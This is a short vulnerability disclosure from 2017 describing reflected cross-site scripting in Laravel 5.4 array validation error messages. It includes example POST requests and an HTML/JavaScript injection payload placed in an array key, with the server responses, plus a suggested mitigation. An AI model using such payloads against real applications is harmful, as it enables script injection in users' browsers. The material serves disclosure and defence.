Laravel 5.4 Cross Site Scripting
Posted on 07 March 2017
# Exploit Title: Laravel non-presistent XSS in validation of arrays # Date: 06/03/2017 # Exploit Author: MaHDyfo (mahdyfof[the at sign]gmail.com) # Vendor Homepage: laravel.com # Version: 5.4 In Laravel validation rules, assume that you set a rule to get an array input. $this->validate($request, [ 'lessons' => 'required|array', 'lessons.*' => 'numeric' ]); Here we say lessons should be array and the elements should be numeric. Now let's enter a character there to fail the validation. POST Request: lessons[]=1&lessons[]=4&lessons[]=abc It tells {"lessons.2":["The lessons.2 must be a number."]} That's OK up to here. But what if we place an index for the array. POST Request: lessons[]=1&lessons[]=4&lessons[example]=abc Response: {"lessons.example":["The lessons.example must be a number."]} POST Request: lessons[]=1&lessons[]=4&lessons[<img src=x onerror='alert(1)'>]=abc Response: {"lessons.<img src=x onerror='alert(1)'>":["The lessons.<img src=x onerror='alert(1)'> must be a number."]} And it executes the alert with no problem... You can see this bug already exists in Laravel official doc: https://laravel.com/docs/master/validation#validating-arrays Maybe the solution is to validate the array values yourself by for example extending validation rules. Regards, MaHDyfo Iran
